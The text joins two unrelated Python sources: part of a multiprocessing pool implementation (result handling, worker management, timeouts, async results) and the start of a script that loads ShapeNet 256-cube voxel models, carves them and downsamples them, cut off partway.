on_state_change = self.on_state_change
time_terminate = None
while cache and self._state != TERMINATE:
if check_timeouts is not None:
check_timeouts()
try:
ready, task = poll(1.0)
except (IOError, EOFError) as exc:
debug('result handler got %r -- exiting', exc)
return
if ready:
if task is None:
debug('result handler ignoring extra sentinel')
continue
on_state_change(task)
try:
join_exited_workers(shutdown=True)
except WorkersJoined:
now = monotonic()
if not time_terminate:
time_terminate = now
else:
if now - time_terminate > 5.0:
debug('result handler exiting: timed out')
break
debug('result handler: all workers terminated, '
'timeout in %ss',
abs(min(now - time_terminate - 5.0, 0)))
if hasattr(outqueue, '_reader'):
debug('ensuring that outqueue is not full')
# If we don't make room available in outqueue then
# attempts to add the sentinel (None) to outqueue may
# block. There is guaranteed to be no more than 2 sentinels.
try:
for i in range(10):
if not outqueue._reader.poll():
break
get()
except (IOError, EOFError):
pass
debug('result handler exiting: len(cache)=%s, thread._state=%s',
len(cache), self._state)
class Pool(object):
'''
Class which supports an async version of applying functions to arguments.
'''
_wrap_exception = True
Worker = Worker
Supervisor = Supervisor
TaskHandler = TaskHandler
TimeoutHandler = TimeoutHandler
ResultHandler = ResultHandler
SoftTimeLimitExceeded = SoftTimeLimitExceeded
def __init__(self, processes=None, initializer=None, initargs=(),
maxtasksperchild=None, timeout=None, soft_timeout=None,
lost_worker_timeout=None,
max_restarts=None, max_restart_freq=1,
on_process_up=None,
on_process_down=None,
on_timeout_set=None,
on_timeout_cancel=None,
threads=True,
semaphore=None,
putlocks=False,
allow_restart=False,
synack=False,
on_process_exit=None,
context=None,
max_memory_per_child=None,
enable_timeouts=False,
**kwargs):
self._ctx = context or get_context()
self.synack = synack
self._setup_queues()
self._taskqueue = Queue()
self._cache = {}
self._state = RUN
self.timeout = timeout
self.soft_timeout = soft_timeout
self._maxtasksperchild = maxtasksperchild
self._max_memory_per_child = max_memory_per_child
self._initializer = initializer
self._initargs = initargs
self._on_process_exit = on_process_exit
self.lost_worker_timeout = lost_worker_timeout or LOST_WORKER_TIMEOUT
self.on_process_up = on_process_up
self.on_process_down = on_process_down
self.on_timeout_set = on_timeout_set
self.on_timeout_cancel = on_timeout_cancel
self.threads = threads
self.readers = {}
self.allow_restart = allow_restart
self.enable_timeouts = bool(
enable_timeouts or
self.timeout is not None or
self.soft_timeout is not None
)
if soft_timeout and SIG_SOFT_TIMEOUT is None:
            warnings.warn(UserWarning(
                "Soft timeouts are not supported on this platform: "
                "it does not have the SIGUSR1 signal.",
            ))
soft_timeout = None
self._processes = self.cpu_count() if processes is None else processes
self.max_restarts = max_restarts or round(self._processes * 100)
self.restart_state = restart_state(max_restarts, max_restart_freq or 1)
if initializer is not None and not callable(initializer):
raise TypeError('initializer must be a callable')
if on_process_exit is not None and not callable(on_process_exit):
raise TypeError('on_process_exit must be callable')
self._Process = self._ctx.Process
self._pool = []
self._poolctrl = {}
self._on_ready_counters = {}
self.putlocks = putlocks
self._putlock = semaphore or LaxBoundedSemaphore(self._processes)
for i in range(self._processes):
self._create_worker_process(i)
self._worker_handler = self.Supervisor(self)
if threads:
self._worker_handler.start()
self._task_handler = self.TaskHandler(self._taskqueue,
self._quick_put,
self._outqueue,
self._pool,
self._cache)
if threads:
self._task_handler.start()
self.check_timeouts = None
# Thread killing timedout jobs.
if self.enable_timeouts:
self._timeout_handler = self.TimeoutHandler(
self._pool, self._cache,
self.soft_timeout, self.timeout,
)
self._timeout_handler_mutex = Lock()
self._timeout_handler_started = False
self._start_timeout_handler()
# If running without threads, we need to check for timeouts
# while waiting for unfinished work at shutdown.
if not threads:
self.check_timeouts = self._timeout_handler.handle_event
else:
self._timeout_handler = None
self._timeout_handler_started = False
self._timeout_handler_mutex = None
# Thread processing results in the outqueue.
self._result_handler = self.create_result_handler()
self.handle_result_event = self._result_handler.handle_event
if threads:
self._result_handler.start()
self._terminate = Finalize(
self, self._terminate_pool,
args=(self._taskqueue, self._inqueue, self._outqueue,
self._pool, self._worker_handler, self._task_handler,
self._result_handler, self._cache,
self._timeout_handler,
self._help_stuff_finish_args()),
exitpriority=15,
)
def Process(self, *args, **kwds):
return self._Process(*args, **kwds)
def WorkerProcess(self, worker):
return worker.contribute_to_object(self.Process(target=worker))
def create_result_handler(self, **extra_kwargs):
return self.ResultHandler(
self._outqueue, self._quick_get, self._cache,
self._poll_result, self._join_exited_workers,
self._putlock, self.restart_state, self.check_timeouts,
self.on_job_ready, on_ready_counters=self._on_ready_counters,
**extra_kwargs
)
def on_job_ready(self, job, i, obj, inqW_fd):
pass
def _help_stuff_finish_args(self):
return self._inqueue, self._task_handler, self._pool
def cpu_count(self):
try:
return cpu_count()
except NotImplementedError:
return 1
def handle_result_event(self, *args):
return self._result_handler.handle_event(*args)
def _process_register_queues(self, worker, queues):
pass
def _process_by_pid(self, pid):
return next((
(proc, i) for i, proc in enumerate(self._pool)
if proc.pid == pid
), (None, None))
def get_process_queues(self):
return self._inqueue, self._outqueue, None
def _create_worker_process(self, i):
sentinel = self._ctx.Event() if self.allow_restart else None
inq, outq, synq = self.get_process_queues()
on_ready_counter = self._ctx.Value('i')
w = self.WorkerProcess(self.Worker(
inq, outq, synq, self._initializer, self._initargs,
self._maxtasksperchild, sentinel, self._on_process_exit,
# Need to handle all signals if using the ipc semaphore,
# to make sure the semaphore is released.
sigprotection=self.threads,
wrap_exception=self._wrap_exception,
max_memory_per_child=self._max_memory_per_child,
on_ready_counter=on_ready_counter,
))
self._pool.append(w)
self._process_register_queues(w, (inq, outq, synq))
w.name = w.name.replace('Process', 'PoolWorker')
w.daemon = True
w.index = i
w.start()
self._poolctrl[w.pid] = sentinel
self._on_ready_counters[w.pid] = on_ready_counter
if self.on_process_up:
self.on_process_up(w)
return w
def process_flush_queues(self, worker):
pass
def _join_exited_workers(self, shutdown=False):
"""Cleanup after any worker processes which have exited due to
reaching their specified lifetime. Returns True if any workers were
cleaned up.
"""
now = None
# The worker may have published a result before being terminated,
# but we have no way to accurately tell if it did. So we wait for
# _lost_worker_timeout seconds before we mark the job with
# WorkerLostError.
for job in [job for job in list(self._cache.values())
if not job.ready() and job._worker_lost]:
now = now or monotonic()
lost_time, lost_ret = job._worker_lost
if now - lost_time > job._lost_worker_timeout:
self.mark_as_worker_lost(job, lost_ret)
if shutdown and not len(self._pool):
raise WorkersJoined()
cleaned, exitcodes = {}, {}
for i in reversed(range(len(self._pool))):
worker = self._pool[i]
exitcode = worker.exitcode
popen = worker._popen
if popen is None or exitcode is not None:
# worker exited
debug('Supervisor: cleaning up worker %d', i)
if popen is not None:
worker.join()
                debug('Supervisor: worker %d joined', i)
cleaned[worker.pid] = worker
exitcodes[worker.pid] = exitcode
if exitcode not in (EX_OK, EX_RECYCLE) and \
not getattr(worker, '_controlled_termination', False):
error(
'Process %r pid:%r exited with %r',
worker.name, worker.pid, human_status(exitcode),
exc_info=0,
)
self.process_flush_queues(worker)
del self._pool[i]
del self._poolctrl[worker.pid]
del self._on_ready_counters[worker.pid]
if cleaned:
all_pids = [w.pid for w in self._pool]
for job in list(self._cache.values()):
acked_by_gone = next(
(pid for pid in job.worker_pids()
if pid in cleaned or pid not in all_pids),
None
)
# already accepted by process
if acked_by_gone:
self.on_job_process_down(job, acked_by_gone)
if not job.ready():
exitcode = exitcodes.get(acked_by_gone) or 0
proc = cleaned.get(acked_by_gone)
if proc and getattr(proc, '_job_terminated', False):
job._set_terminated(exitcode)
else:
self.on_job_process_lost(
job, acked_by_gone, exitcode,
)
else:
# started writing to
write_to = job._write_to
# was scheduled to write to
sched_for = job._scheduled_for
if write_to and not write_to._is_alive():
self.on_job_process_down(job, write_to.pid)
elif sched_for and not sched_for._is_alive():
self.on_job_process_down(job, sched_for.pid)
for worker in values(cleaned):
if self.on_process_down:
if not shutdown:
self._process_cleanup_queues(worker)
self.on_process_down(worker)
return list(exitcodes.values())
return []
def on_partial_read(self, job, worker):
pass
def _process_cleanup_queues(self, worker):
pass
def on_job_process_down(self, job, pid_gone):
pass
def on_job_process_lost(self, job, pid, exitcode):
job._worker_lost = (monotonic(), exitcode)
def mark_as_worker_lost(self, job, exitcode):
try:
raise WorkerLostError(
'Worker exited prematurely: {0} Job: {1}.'.format(
human_status(exitcode), job._job),
)
except WorkerLostError:
job._set(None, (False, ExceptionInfo()))
else: # pragma: no cover
pass
def __enter__(self):
return self
def __exit__(self, *exc_info):
return self.terminate()
def on_grow(self, n):
pass
def on_shrink(self, n):
pass
def shrink(self, n=1):
for i, worker in enumerate(self._iterinactive()):
self._processes -= 1
if self._putlock:
self._putlock.shrink()
worker.terminate_controlled()
self.on_shrink(1)
if i >= n - 1:
break
else:
raise ValueError("Can't shrink pool. All processes busy!")
def grow(self, n=1):
for i in range(n):
self._processes += 1
if self._putlock:
self._putlock.grow()
self.on_grow(n)
def _iterinactive(self):
for worker in self._pool:
if not self._worker_active(worker):
yield worker
def _worker_active(self, worker):
for job in values(self._cache):
if worker.pid in job.worker_pids():
return True
return False
def _repopulate_pool(self, exitcodes):
"""Bring the number of pool processes up to the specified number,
for use after reaping workers which have exited.
"""
for i in range(self._processes - len(self._pool)):
if self._state != RUN:
return
try:
if exitcodes and exitcodes[i] not in (EX_OK, EX_RECYCLE):
self.restart_state.step()
except IndexError:
self.restart_state.step()
self._create_worker_process(self._avail_index())
debug('added worker')
def _avail_index(self):
assert len(self._pool) < self._processes
indices = set(p.index for p in self._pool)
return next(i for i in range(self._processes) if i not in indices)
def did_start_ok(self):
return not self._join_exited_workers()
def _maintain_pool(self):
""""Clean up any exited workers and start replacements for them.
"""
joined = self._join_exited_workers()
self._repopulate_pool(joined)
for i in range(len(joined)):
if self._putlock is not None:
self._putlock.release()
def maintain_pool(self):
if self._worker_handler._state == RUN and self._state == RUN:
try:
self._maintain_pool()
except RestartFreqExceeded:
self.close()
self.join()
raise
except OSError as exc:
if get_errno(exc) == errno.ENOMEM:
reraise(MemoryError,
MemoryError(str(exc)),
sys.exc_info()[2])
raise
def _setup_queues(self):
self._inqueue = self._ctx.SimpleQueue()
self._outqueue = self._ctx.SimpleQueue()
self._quick_put = self._inqueue._writer.send
self._quick_get = self._outqueue._reader.recv
def _poll_result(timeout):
if self._outqueue._reader.poll(timeout):
return True, self._quick_get()
return False, None
self._poll_result = _poll_result
def _start_timeout_handler(self):
# ensure more than one thread does not start the timeout handler
# thread at once.
if self.threads and self._timeout_handler is not None:
with self._timeout_handler_mutex:
if not self._timeout_handler_started:
self._timeout_handler_started = True
self._timeout_handler.start()
def apply(self, func, args=(), kwds={}):
'''
Equivalent of `func(*args, **kwargs)`.
'''
if self._state == RUN:
return self.apply_async(func, args, kwds).get()
def starmap(self, func, iterable, chunksize=None):
'''
Like `map()` method but the elements of the `iterable` are expected to
be iterables as well and will be unpacked as arguments. Hence
`func` and (a, b) becomes func(a, b).
'''
if self._state == RUN:
return self._map_async(func, iterable,
starmapstar, chunksize).get()
def starmap_async(self, func, iterable, chunksize=None,
callback=None, error_callback=None):
'''
Asynchronous version of `starmap()` method.
'''
if self._state == RUN:
return self._map_async(func, iterable, starmapstar, chunksize,
callback, error_callback)
def map(self, func, iterable, chunksize=None):
'''
Apply `func` to each element in `iterable`, collecting the results
in a list that is returned.
'''
if self._state == RUN:
return self.map_async(func, iterable, chunksize).get()
def imap(self, func, iterable, chunksize=1, lost_worker_timeout=None):
'''
Equivalent of `map()` -- can be MUCH slower than `Pool.map()`.
'''
if self._state != RUN:
return
lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout
if chunksize == 1:
result = IMapIterator(self._cache,
lost_worker_timeout=lost_worker_timeout)
self._taskqueue.put((
((TASK, (result._job, i, func, (x,), {}))
for i, x in enumerate(iterable)),
result._set_length,
))
return result
else:
assert chunksize > 1
task_batches = Pool._get_tasks(func, iterable, chunksize)
result = IMapIterator(self._cache,
lost_worker_timeout=lost_worker_timeout)
self._taskqueue.put((
((TASK, (result._job, i, mapstar, (x,), {}))
for i, x in enumerate(task_batches)),
result._set_length,
))
return (item for chunk in result for item in chunk)
def imap_unordered(self, func, iterable, chunksize=1,
lost_worker_timeout=None):
'''
Like `imap()` method but ordering of results is arbitrary.
'''
if self._state != RUN:
return
lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout
if chunksize == 1:
result = IMapUnorderedIterator(
self._cache, lost_worker_timeout=lost_worker_timeout,
)
self._taskqueue.put((
((TASK, (result._job, i, func, (x,), {}))
for i, x in enumerate(iterable)),
result._set_length,
))
return result
else:
assert chunksize > 1
task_batches = Pool._get_tasks(func, iterable, chunksize)
result = IMapUnorderedIterator(
self._cache, lost_worker_timeout=lost_worker_timeout,
)
self._taskqueue.put((
((TASK, (result._job, i, mapstar, (x,), {}))
for i, x in enumerate(task_batches)),
result._set_length,
))
return (item for chunk in result for item in chunk)
def apply_async(self, func, args=(), kwds={},
callback=None, error_callback=None, accept_callback=None,
timeout_callback=None, waitforslot=None,
soft_timeout=None, timeout=None, lost_worker_timeout=None,
callbacks_propagate=(),
correlation_id=None):
'''
Asynchronous equivalent of `apply()` method.
        Callback is called when the function's return value is ready.
The accept callback is called when the job is accepted to be executed.
        Simplified, the flow is like this:
>>> def apply_async(func, args, kwds, callback, accept_callback):
... if accept_callback:
... accept_callback()
... retval = func(*args, **kwds)
... if callback:
... callback(retval)
'''
if self._state != RUN:
return
soft_timeout = soft_timeout or self.soft_timeout
timeout = timeout or self.timeout
lost_worker_timeout = lost_worker_timeout or self.lost_worker_timeout
if soft_timeout and SIG_SOFT_TIMEOUT is None:
            warnings.warn(UserWarning(
                "Soft timeouts are not supported on this platform: "
                "it does not have the SIGUSR1 signal.",
            ))
soft_timeout = None
if self._state == RUN:
waitforslot = self.putlocks if waitforslot is None else waitforslot
if waitforslot and self._putlock is not None:
self._putlock.acquire()
result = ApplyResult(
self._cache, callback, accept_callback, timeout_callback,
error_callback, soft_timeout, timeout, lost_worker_timeout,
on_timeout_set=self.on_timeout_set,
on_timeout_cancel=self.on_timeout_cancel,
callbacks_propagate=callbacks_propagate,
send_ack=self.send_ack if self.synack else None,
correlation_id=correlation_id,
)
if timeout or soft_timeout:
# start the timeout handler thread when required.
self._start_timeout_handler()
if self.threads:
self._taskqueue.put(([(TASK, (result._job, None,
func, args, kwds))], None))
else:
self._quick_put((TASK, (result._job, None, func, args, kwds)))
return result
def send_ack(self, response, job, i, fd):
pass
def terminate_job(self, pid, sig=None):
proc, _ = self._process_by_pid(pid)
if proc is not None:
try:
_kill(pid, sig or TERM_SIGNAL)
except OSError as exc:
if get_errno(exc) != errno.ESRCH:
raise
else:
proc._controlled_termination = True
proc._job_terminated = True
def map_async(self, func, iterable, chunksize=None,
callback=None, error_callback=None):
'''
Asynchronous equivalent of `map()` method.
'''
return self._map_async(
func, iterable, mapstar, chunksize, callback, error_callback,
)
def _map_async(self, func, iterable, mapper, chunksize=None,
callback=None, error_callback=None):
'''
Helper function to implement map, starmap and their async counterparts.
'''
if self._state != RUN:
return
if not hasattr(iterable, '__len__'):
iterable = list(iterable)
if chunksize is None:
chunksize, extra = divmod(len(iterable), len(self._pool) * 4)
if extra:
chunksize += 1
if len(iterable) == 0:
chunksize = 0
task_batches = Pool._get_tasks(func, iterable, chunksize)
result = MapResult(self._cache, chunksize, len(iterable), callback,
error_callback=error_callback)
self._taskqueue.put((((TASK, (result._job, i, mapper, (x,), {}))
for i, x in enumerate(task_batches)), None))
return result
@staticmethod
def _get_tasks(func, it, size):
it = iter(it)
while 1:
x = tuple(itertools.islice(it, size))
if not x:
return
yield (func, x)
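    # e.g. _get_tasks(f, range(5), 2) yields (f, (0, 1)), (f, (2, 3)), (f, (4,)).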
def __reduce__(self):
raise NotImplementedError(
'pool objects cannot be passed between processes or pickled',
)
def close(self):
debug('closing pool')
if self._state == RUN:
self._state = CLOSE
if self._putlock:
self._putlock.clear()
self._worker_handler.close()
self._taskqueue.put(None)
stop_if_not_current(self._worker_handler)
def terminate(self):
debug('terminating pool')
self._state = TERMINATE
self._worker_handler.terminate()
self._terminate()
@staticmethod
def _stop_task_handler(task_handler):
stop_if_not_current(task_handler)
def join(self):
assert self._state in (CLOSE, TERMINATE)
debug('joining worker handler')
stop_if_not_current(self._worker_handler)
debug('joining task handler')
self._stop_task_handler(self._task_handler)
debug('joining result handler')
stop_if_not_current(self._result_handler)
debug('result handler joined')
for i, p in enumerate(self._pool):
debug('joining worker %s/%s (%r)', i + 1, len(self._pool), p)
if p._popen is not None: # process started?
p.join()
debug('pool join complete')
def restart(self):
for e in values(self._poolctrl):
e.set()
@staticmethod
def _help_stuff_finish(inqueue, task_handler, _pool):
# task_handler may be blocked trying to put items on inqueue
debug('removing tasks from inqueue until task handler finished')
inqueue._rlock.acquire()
while task_handler.is_alive() and inqueue._reader.poll():
inqueue._reader.recv()
time.sleep(0)
@classmethod
def _set_result_sentinel(cls, outqueue, pool):
outqueue.put(None)
@classmethod
def _terminate_pool(cls, taskqueue, inqueue, outqueue, pool,
worker_handler, task_handler,
result_handler, cache, timeout_handler,
help_stuff_finish_args):
# this is guaranteed to only be called once
debug('finalizing pool')
worker_handler.terminate()
task_handler.terminate()
taskqueue.put(None) # sentinel
debug('helping task handler/workers to finish')
cls._help_stuff_finish(*help_stuff_finish_args)
result_handler.terminate()
cls._set_result_sentinel(outqueue, pool)
if timeout_handler is not None:
timeout_handler.terminate()
# Terminate workers which haven't already finished
if pool and hasattr(pool[0], 'terminate'):
debug('terminating workers')
for p in pool:
if p._is_alive():
p.terminate()
debug('joining task handler')
cls._stop_task_handler(task_handler)
debug('joining result handler')
result_handler.stop()
if timeout_handler is not None:
debug('joining timeout handler')
timeout_handler.stop(TIMEOUT_MAX)
if pool and hasattr(pool[0], 'terminate'):
debug('joining pool workers')
for p in pool:
if p.is_alive():
# worker has not yet exited
debug('cleaning up worker %d', p.pid)
if p._popen is not None:
p.join()
debug('pool workers joined')
if inqueue:
inqueue.close()
if outqueue:
outqueue.close()
@property
def process_sentinels(self):
return [w._popen.sentinel for w in self._pool]
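# A minimal usage sketch (assuming the package providing this module is
# importable; the function name below is illustrative):
#
#   def square(x):
#       return x * x
#
#   with Pool(processes=4, soft_timeout=5, timeout=10) as pool:
#       async_res = pool.apply_async(square, (3,), callback=print)
#       print(async_res.get(timeout=30))
#       print(pool.map(square, range(10)))
#   # Note: __exit__ calls terminate(); call close() and join() explicitly
#   # for a graceful drain instead.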
#
# Class whose instances are returned by `Pool.apply_async()`
#
class ApplyResult(object):
_worker_lost = None
_write_to = None
_scheduled_for = None
def __init__(self, cache, callback, accept_callback=None,
timeout_callback=None, error_callback=None, soft_timeout=None,
timeout=None, lost_worker_timeout=LOST_WORKER_TIMEOUT,
on_timeout_set=None, on_timeout_cancel=None,
callbacks_propagate=(), send_ack=None,
correlation_id=None):
self.correlation_id = correlation_id
self._mutex = Lock()
self._event = threading.Event()
self._job = next(job_counter)
self._cache = cache
self._callback = callback
self._accept_callback = accept_callback
self._error_callback = error_callback
self._timeout_callback = timeout_callback
self._timeout = timeout
self._soft_timeout = soft_timeout
self._lost_worker_timeout = lost_worker_timeout
self._on_timeout_set = on_timeout_set
self._on_timeout_cancel = on_timeout_cancel
self._callbacks_propagate = callbacks_propagate or ()
self._send_ack = send_ack
self._accepted = False
self._cancelled = False
self._worker_pid = None
self._time_accepted = None
self._terminated = None
cache[self._job] = self
def __repr__(self):
return '<%s: {id} ack:{ack} ready:{ready}>'.format(
self.__class__.__name__,
id=self._job, ack=self._accepted, ready=self.ready(),
)
def ready(self):
return self._event.isSet()
def accepted(self):
return self._accepted
def successful(self):
assert self.ready()
return self._success
def _cancel(self):
"""Only works if synack is used."""
self._cancelled = True
def discard(self):
self._cache.pop(self._job, None)
def terminate(self, signum):
self._terminated = signum
def _set_terminated(self, signum=None):
try:
raise Terminated(-(signum or 0))
except Terminated:
self._set(None, (False, ExceptionInfo()))
def worker_pids(self):
return [self._worker_pid] if self._worker_pid else []
def wait(self, timeout=None):
self._event.wait(timeout)
def get(self, timeout=None):
self.wait(timeout)
if not self.ready():
raise TimeoutError
if self._success:
return self._value
else:
raise self._value.exception
def safe_apply_callback(self, fun, *args, **kwargs):
if fun:
try:
fun(*args, **kwargs)
except self._callbacks_propagate:
raise
except Exception as exc:
error('Pool callback raised exception: %r', exc,
exc_info=1)
def handle_timeout(self, soft=False):
if self._timeout_callback is not None:
self.safe_apply_callback(
self._timeout_callback, soft=soft,
timeout=self._soft_timeout if soft else self._timeout,
)
def _set(self, i, obj):
with self._mutex:
if self._on_timeout_cancel:
self._on_timeout_cancel(self)
self._success, self._value = obj
self._event.set()
if self._accepted:
# if not accepted yet, then the set message
# was received before the ack, which means
# the ack will remove the entry.
self._cache.pop(self._job, None)
# apply callbacks last
if self._callback and self._success:
self.safe_apply_callback(
self._callback, self._value)
if (self._value is not None and
self._error_callback and not self._success):
self.safe_apply_callback(
self._error_callback, self._value)
def _ack(self, i, time_accepted, pid, synqW_fd):
with self._mutex:
if self._cancelled and self._send_ack:
self._accepted = True
if synqW_fd:
return self._send_ack(NACK, pid, self._job, synqW_fd)
return
self._accepted = True
self._time_accepted = time_accepted
self._worker_pid = pid
if self.ready():
# ack received after set()
self._cache.pop(self._job, None)
if self._on_timeout_set:
self._on_timeout_set(self, self._soft_timeout, self._timeout)
response = ACK
if self._accept_callback:
try:
self._accept_callback(pid, time_accepted)
                except self._callbacks_propagate:
response = NACK
raise
except Exception:
response = NACK
# ignore other errors
finally:
if self._send_ack and synqW_fd:
return self._send_ack(
response, pid, self._job, synqW_fd
)
if self._send_ack and synqW_fd:
self._send_ack(response, pid, self._job, synqW_fd)
#
# Class whose instances are returned by `Pool.map_async()`
#
class MapResult(ApplyResult):
def __init__(self, cache, chunksize, length, callback, error_callback):
ApplyResult.__init__(
self, cache, callback, error_callback=error_callback,
)
self._success = True
self._length = length
self._value = [None] * length
self._accepted = [False] * length
self._worker_pid = [None] * length
self._time_accepted = [None] * length
self._chunksize = chunksize
if chunksize <= 0:
self._number_left = 0
self._event.set()
del cache[self._job]
else:
self._number_left = length // chunksize + bool(length % chunksize)
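    # e.g. length=10, chunksize=3 gives _number_left = 10 // 3 + bool(10 % 3) = 4;
    # each successful _set(i, ...) then fills value slots [i*3:(i+1)*3].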
def _set(self, i, success_result):
success, result = success_result
if success:
self._value[i * self._chunksize:(i + 1) * self._chunksize] = result
self._number_left -= 1
if self._number_left == 0:
if self._callback:
self._callback(self._value)
if self._accepted:
self._cache.pop(self._job, None)
self._event.set()
else:
self._success = False
self._value = result
if self._error_callback:
self._error_callback(self._value)
if self._accepted:
self._cache.pop(self._job, None)
self._event.set()
def _ack(self, i, time_accepted, pid, *args):
start = i * self._chunksize
stop = min((i + 1) * self._chunksize, self._length)
for j in range(start, stop):
self._accepted[j] = True
self._worker_pid[j] = pid
self._time_accepted[j] = time_accepted
if self.ready():
self._cache.pop(self._job, None)
def accepted(self):
return all(self._accepted)
def worker_pids(self):
return [pid for pid in self._worker_pid if pid]
#
# Class whose instances are returned by `Pool.imap()`
#
class IMapIterator(object):
_worker_lost = None
def __init__(self, cache, lost_worker_timeout=LOST_WORKER_TIMEOUT):
self._cond = threading.Condition(threading.Lock())
self._job = next(job_counter)
self._cache = cache
self._items = deque()
self._index = 0
self._length = None
self._ready = False
self._unsorted = {}
self._worker_pids = []
self._lost_worker_timeout = lost_worker_timeout
cache[self._job] = self
def __iter__(self):
return self
def next(self, timeout=None):
with self._cond:
try:
item = self._items.popleft()
except IndexError:
if self._index == self._length:
self._ready = True
raise StopIteration
self._cond.wait(timeout)
try:
item = self._items.popleft()
except IndexError:
if self._index == self._length:
self._ready = True
raise StopIteration
raise TimeoutError
success, value = item
if success:
return value
raise Exception(value)
__next__ = next # XXX
def _set(self, i, obj):
with self._cond:
if self._index == i:
self._items.append(obj)
self._index += 1
while self._index in self._unsorted:
obj = self._unsorted.pop(self._index)
self._items.append(obj)
self._index += 1
self._cond.notify()
else:
self._unsorted[i] = obj
if self._index == self._length:
self._ready = True
del self._cache[self._job]
def _set_length(self, length):
with self._cond:
self._length = length
if self._index == self._length:
self._ready = True
self._cond.notify()
del self._cache[self._job]
def _ack(self, i, time_accepted, pid, *args):
self._worker_pids.append(pid)
def ready(self):
return self._ready
def worker_pids(self):
return self._worker_pids
#
# Class whose instances are returned by `Pool.imap_unordered()`
#
class IMapUnorderedIterator(IMapIterator):
def _set(self, i, obj):
with self._cond:
self._items.append(obj)
self._index += 1
self._cond.notify()
if self._index == self._length:
self._ready = True
del self._cache[self._job]
#
#
#
class ThreadPool(Pool):
from .dummy import Process as DummyProcess
Process = DummyProcess
def __init__(self, processes=None, initializer=None, initargs=()):
Pool.__init__(self, processes, initializer, initargs)
def _setup_queues(self):
self._inqueue = Queue()
self._outqueue = Queue()
self._quick_put = self._inqueue.put
self._quick_get = self._outqueue.get
def _poll_result(timeout):
try:
return True, self._quick_get(timeout=timeout)
except Empty:
return False, None
self._poll_result = _poll_result
@staticmethod
def _help_stuff_finish(inqueue, task_handler, pool):
# put sentinels at head of inqueue to make workers finish
with inqueue.not_empty:
inqueue.queue.clear()
inqueue.queue.extend([None] * len(pool))
inqueue.not_empty.notify_all()
|
2_gather_256vox_16_32_64.py
|
import numpy as np
import cv2
import os
import h5py
from scipy.io import loadmat
import random
import json
from multiprocessing import Process, Queue
import queue
import time
#import mcubes
class_name_list_all = [
"02691156_airplane",
"02828884_bench",
"02933112_cabinet",
"02958343_car",
"03001627_chair",
"03211117_display",
"03636649_lamp",
"03691459_speaker",
"04090263_rifle",
"04256520_couch",
"04379243_table",
"04401088_phone",
"04530566_vessel",
]
class_name = "03001627_chair"
dim = 64
vox_size_1 = 16
vox_size_2 = 32
vox_size_3 = 64
batch_size_1 = 16*16*16
batch_size_2 = 16*16*16
batch_size_3 = 16*16*16*4
'''
#do not use progressive sampling (center 2x2x2 -> 4x4x4 -> 6x6x6 -> ...)
#if we sample non-center points only for inner (1) voxels,
#the reconstructed model will show railing patterns:
#since all zero-points are centered at cells,
#the model will expand one-points into one-planes.
'''
def sample_point_in_cube(block,target_value,halfie):
halfie2 = halfie*2
for i in range(100):
x = np.random.randint(halfie2)
y = np.random.randint(halfie2)
z = np.random.randint(halfie2)
if block[x,y,z]==target_value:
return x,y,z
if block[halfie,halfie,halfie]==target_value:
return halfie,halfie,halfie
i=1
ind = np.unravel_index(np.argmax(block[halfie-i:halfie+i,halfie-i:halfie+i,halfie-i:halfie+i], axis=None), (i*2,i*2,i*2))
if block[ind[0]+halfie-i,ind[1]+halfie-i,ind[2]+halfie-i]==target_value:
return ind[0]+halfie-i,ind[1]+halfie-i,ind[2]+halfie-i
for i in range(2,halfie+1):
six = [(halfie-i,halfie,halfie),(halfie+i-1,halfie,halfie),(halfie,halfie,halfie-i),(halfie,halfie,halfie+i-1),(halfie,halfie-i,halfie),(halfie,halfie+i-1,halfie)]
for j in range(6):
if block[six[j]]==target_value:
return six[j]
ind = np.unravel_index(np.argmax(block[halfie-i:halfie+i,halfie-i:halfie+i,halfie-i:halfie+i], axis=None), (i*2,i*2,i*2))
if block[ind[0]+halfie-i,ind[1]+halfie-i,ind[2]+halfie-i]==target_value:
return ind[0]+halfie-i,ind[1]+halfie-i,ind[2]+halfie-i
print('hey, error in your code!')
exit(0)
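# sample_point_in_cube returns the (x, y, z) offset of a voxel equal to
# target_value inside a (2*halfie)^3 block: it first tries random positions,
# then the center, then shells expanding outward from the center.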
def get_points_from_vox(q, name_list):
name_num = len(name_list)
for idx in range(name_num):
print(idx,'/',name_num)
#get voxel models
try:
voxel_model_mat = loadmat(name_list[idx][1])
except:
print("error in loading")
exit(-1)
voxel_model_b = voxel_model_mat['b'][:].astype(np.int32)
voxel_model_bi = voxel_model_mat['bi'][:].astype(np.int32)-1
voxel_model_256 = np.zeros([256,256,256],np.uint8)
for i in range(16):
for j in range(16):
for k in range(16):
voxel_model_256[i*16:i*16+16,j*16:j*16+16,k*16:k*16+16] = voxel_model_b[voxel_model_bi[i,j,k]]
#add flip&transpose to convert coord from shapenet_v1 to shapenet_v2
voxel_model_256 = np.flip(np.transpose(voxel_model_256, (2,1,0)),2)
#vertices, triangles = mcubes.marching_cubes(voxel_model_256, 0.5)
#mcubes.export_mesh(vertices, triangles, "samples/"+name_list[idx][1][-10:-4]+"_origin.dae", str(idx))
#carve the voxels from side views:
#top direction = Y(j) positive direction
dim_voxel = 256
top_view = np.max(voxel_model_256, axis=1)
left_min = np.full([dim_voxel,dim_voxel],dim_voxel,np.int32)
left_max = np.full([dim_voxel,dim_voxel],-1,np.int32)
front_min = np.full([dim_voxel,dim_voxel],dim_voxel,np.int32)
front_max = np.full([dim_voxel,dim_voxel],-1,np.int32)
for j in range(dim_voxel):
for k in range(dim_voxel):
occupied = False
for i in range(dim_voxel):
if voxel_model_256[i,j,k]>0:
if not occupied:
occupied = True
left_min[j,k] = i
left_max[j,k] = i
for i in range(dim_voxel):
for j in range(dim_voxel):
occupied = False
for k in range(dim_voxel):
if voxel_model_256[i,j,k]>0:
if not occupied:
occupied = True
front_min[i,j] = k
front_max[i,j] = k
for i in range(dim_voxel):
for k in range(dim_voxel):
if top_view[i,k]>0:
fill_flag = False
for j in range(dim_voxel-1,-1,-1):
if voxel_model_256[i,j,k]>0:
fill_flag = True
else:
if left_min[j,k]<i and left_max[j,k]>i and front_min[i,j]<k and front_max[i,j]>k:
if fill_flag:
voxel_model_256[i,j,k]=1
else:
fill_flag = False
#vertices, triangles = mcubes.marching_cubes(voxel_model_256, 0.5)
#mcubes.export_mesh(vertices, triangles, "samples/"+name_list[idx][1][-10:-4]+"_alt.dae", str(idx))
#compress model 256 -> 64
dim_voxel = 64
voxel_model_temp = np.zeros([dim_voxel,dim_voxel,dim_voxel],np.uint8)
multiplier = int(256/dim_voxel)
halfie = int(multiplier/2)
